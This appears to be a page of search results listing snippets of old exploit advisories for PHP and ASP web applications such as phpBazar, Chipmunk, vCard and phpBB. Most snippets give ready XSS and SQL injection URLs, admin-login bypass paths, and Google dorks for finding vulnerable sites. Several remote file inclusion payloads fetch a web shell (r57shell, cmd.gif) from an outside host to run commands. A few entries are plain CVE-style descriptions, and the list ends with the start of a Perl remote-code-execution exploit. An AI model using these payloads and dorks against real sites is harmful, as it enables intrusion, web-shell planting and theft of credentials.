2705 matches found
Xss exploit in Chipmunk directory
Xss exploit in Chipmunk directory forum type : Chipmunk directory bug found by : black-code team : site-down type : Xss black-code: codes : http://www.example.com/directory/index.php?catid=catid&start='scriptalert10/script path to admin login: http://www.xxx.com/path/admin All my respect to my...
Sql injection
Multiple SQL injection vulnerabilities in Tamber Forum 1.9.13 and earlier allow remote attackers to execute arbitrary SQL commands via the 1 frmid parameter to a showforum.asp, 2 a search field to b forumsearch.asp, 3 Email address or 4 Password to c admin/index.asp, 5 frmcatid parameter to d...
Critical sql injection in saphplesson 2.0
Critical sql injection in : forum type : saphplesson 2.0 bug found by : black-code&sweet-devil team : site-down type : sql injection black-code: http://www.xxx.net/sh3r/add.php?forumid=-120union20select20Modpassword20from20modretor sweet-devil:...
multiple Xss exploits in : vCard 2.9
Subject: multiple Xss exploits in : vCard 2.9 Date: 27 May 2006 11:12:55 -0000 multiple Xss exploits in : vCard 2.9 forum type : vCard 2.9 bug found by : black-code&sweet-devil team : site-down type : Xss sweet-devil: http://www.example.com/cards/create.php?cardid='scriptalert10/script...
Multiple Xss exploits in Chipmunk Board
Subject: Multiple Xss exploits in Chipmunk Board Date: 27 May 2006 10:51:30 -0000 Multiple Xss exploits in Chipmunk Board forum type : Chipmunk Board bug found by : black-code&sweet-devil team : site-down type : Xss black-code: codes :...
multiple file include exploits in EzUpload Pro v2.10
multiple file include exploits in EzUpload Pro v2.10 forum type : EzUpload Pro v2.10 bug found by : black-code & sweet-devil team : site-down type : file include exploits : form.php http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd customize.php...
Xss exploit in Photoalbum B&W v1.3
Xss exploit in Photoalbum B&W v1.3 forum type : Photoalbum B&W v1.3 bug found by : black-code & sweet-devil team : site-down type : Xss exploit : http://www.example.com/superalbum/index.php?pic='scriptalert10/script path to admin login: emails: [email protected] & [email protected] All my...
phpBazar210.txt
Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password: /admin/admin.php?action=editmember&value=1 Fou...
phpBazar <= 2.1.0 Multiple vulnerabilites
Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password: /admin/admin.php?action=editmember&value=1 Fou...
phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities
Exploit for unknown platform in category web applications ============================================================== phpBazar = 2.1.0 Remote Include/Auth Bypass Vulnerabilities ============================================================== Title: phpBazar = 2.1.0 Multiple vulnerabilites URL:...
phpBazar 2.1.0 - Remote File Inclusion Authentication Bypass
phpBazar 2.1.0 - Remote File Inclusion Authentication Bypass Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login...
phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities
No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...
eWebEditor: the website of the invisible bomb-vulnerability warning-the black bar safety net
Article author: koshan Information source: http://www.hacker.com.cn/ Dear webmasters in using the eWebEditor is found, eWebEditor improperly configured so that it will become the site of the Unabomber? The first discovery of this vulnerability stems from last year's invasion, in the dead end of t...
Sql injection
Multiple SQL injection vulnerabilities in Pro Publish 2.0 allow remote attackers to execute arbitrary SQL commands via the 1 email and 2 password parameter to a admin/login.php, 3 findstr parameter to b search.php, or 4 artid parameter to c art.php, or 5 catid parameter to d cat.php...
CVE-2006-2128
Multiple SQL injection vulnerabilities in Pro Publish 2.0 allow remote attackers to execute arbitrary SQL commands via the 1 email and 2 password parameter to a admin/login.php, 3 findstr parameter to b search.php, or 4 artid parameter to c art.php, or 5 catid parameter to d cat.php...
planetGallery admin login
google dork - inurl:planetgallery last path add to /admin/galleryadmin.php example: http://site.com/planetgallery/admin/galleryadmin.php no pass, no login, sending your shell. credits:tugr@,AlpEren...
JMK's Picture Gallery admin login
dork: "JMK's Picture Gallery" and last path to add : admingallery.php3?action=add&upload=1 example:hhtp://www.site.com/path/.../admingallery.php3?action=add&upload=1 credits:AlpEren,tugr@...
free-php.net Poll 1.0 admin login
google dork:"powered by free-php.net" poll last path add to /admin/ select poll and modify or addnew poll credits:tugr@...
Sql injection
SQL injection vulnerability in admin/login.php in Chipmunk Guestbook allows remote attackers to execute arbitrary SQL commands and bypass login authentication via the User name...
phpBB 2.0.19 - user_sig_bbcode_uid Remote Code Execution
phpBB 2.0.19 - usersigbbcodeuid Remote Code Execution !/usr/bin/perl r57phpbba2e2.pl - phpBB admin 2 exec exploit version 2 based on usersigbbcodeuid bug tested on 2.0.12 , 2.0.13 , 2.0.19 -------------------------------------------- screen r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L...